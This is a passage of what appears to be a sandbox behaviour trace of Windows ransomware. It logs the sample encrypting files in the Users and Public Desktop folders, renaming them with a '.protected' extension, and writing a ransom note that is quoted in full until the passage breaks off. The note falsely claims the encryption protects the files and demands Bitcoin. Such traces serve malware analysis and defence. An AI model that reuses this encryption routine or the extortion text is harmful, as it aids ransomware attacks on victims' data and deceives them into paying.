lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x295f62c*, lpNumberOfBytesWritten=0x295f654*=0x4, lpOverlapped=0x0) returned 1 [0095.455] WriteFile (in: hFile=0x104, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f654*=0x30, lpOverlapped=0x0) returned 1 [0095.455] CloseHandle (hObject=0x104) returned 1 [0095.456] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\desktop.ini.protected") returned 34 [0095.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\desktop.ini.protected" (normalized: "c:\\users\\desktop.ini.protected")) returned 1 [0095.456] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Windows") returned -1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Program Files") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="Program Files (x86)") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="$Recycle.bin") returned 1 [0095.456] lstrcmpiW (lpString1="Public", lpString2="System Volume Information") returned -1 [0095.456] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public") returned 19 [0095.456] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0095.456] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0095.456] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\*") returned 21 [0095.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x47b950 [0095.457] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\.") returned 21 [0095.457] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.457] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.457] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\." 
(normalized: "c:\\users\\public\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.457] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\..") returned 22 [0095.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.457] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.457] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\.." 
(normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.457] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0095.457] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0095.457] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop") returned 27 [0095.457] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0095.457] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0095.458] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\*") returned 29 [0095.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.458] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\.") returned 29 [0095.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.458] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.458] lstrcmpW 
(lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\." (normalized: "c:\\users\\public\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.458] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\..") returned 30 [0095.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.459] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.459] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.459] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Windows") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Program Files") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Program Files (x86)") returned -1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="$Recycle.bin") returned 1 [0095.459] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="System Volume Information") returned -1 [0095.459] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrIW (lpFirst="Adobe Reader X.lnk", lpSrch=".protected") returned 0x0 [0095.459] lstrcmpW (lpString1="Adobe Reader X.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".txt") returned 0x0 [0095.459] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.459] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".rar") returned 0x0 [0095.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0095.460] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".zip") returned 0x0 [0095.460] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x7e9, lpOverlapped=0x0) returned 1 [0095.460] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff817, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x7e9, lpOverlapped=0x0) returned 1 [0095.460] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.460] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.460] CloseHandle (hObject=0xb4) returned 1 [0095.461] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.protected") returned 56 [0095.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), 
lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.protected" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.protected")) returned 1 [0095.462] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.462] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.462] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.462] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.462] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.462] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.462] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.462] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.462] 
lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0095.462] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.462] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.463] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xae, lpOverlapped=0x0) returned 1 [0095.463] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.463] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.463] CloseHandle (hObject=0xb4) returned 1 [0095.463] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.protected") returned 49 [0095.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\public\\desktop\\desktop.ini.protected")) returned 1 [0095.464] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: 
lpFindFileData=0x295f190) returned 1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0095.464] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0095.464] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0095.464] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.464] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0095.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0095.465] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 
[0095.465] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x8d1, lpOverlapped=0x0) returned 1 [0095.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff72f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x8d1, lpOverlapped=0x0) returned 1 [0095.465] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.465] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.465] CloseHandle (hObject=0xb4) returned 1 [0095.466] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.protected") returned 55 [0095.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.protected" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.protected")) returned 1 [0095.466] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Windows") returned -1 [0095.466] 
lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files") returned -1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Program Files (x86)") returned -1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="$Recycle.bin") returned 1 [0095.466] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="System Volume Information") returned -1 [0095.466] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.466] StrStrIW (lpFirst="Mozilla Firefox.lnk", lpSrch=".protected") returned 0x0 [0095.466] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0095.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".rar") returned 0x0 [0095.467] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0095.467] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".zip") returned 0x0 [0095.467] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x485, lpOverlapped=0x0) returned 1 [0095.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x485, lpOverlapped=0x0) returned 1 [0095.468] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.468] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.468] CloseHandle (hObject=0xb4) returned 1 [0095.468] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.protected") returned 57 [0095.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.protected" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.protected")) returned 1 [0095.469] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.469] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.469] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\RESTORE_FILES.txt") returned 45 [0095.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.470] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: 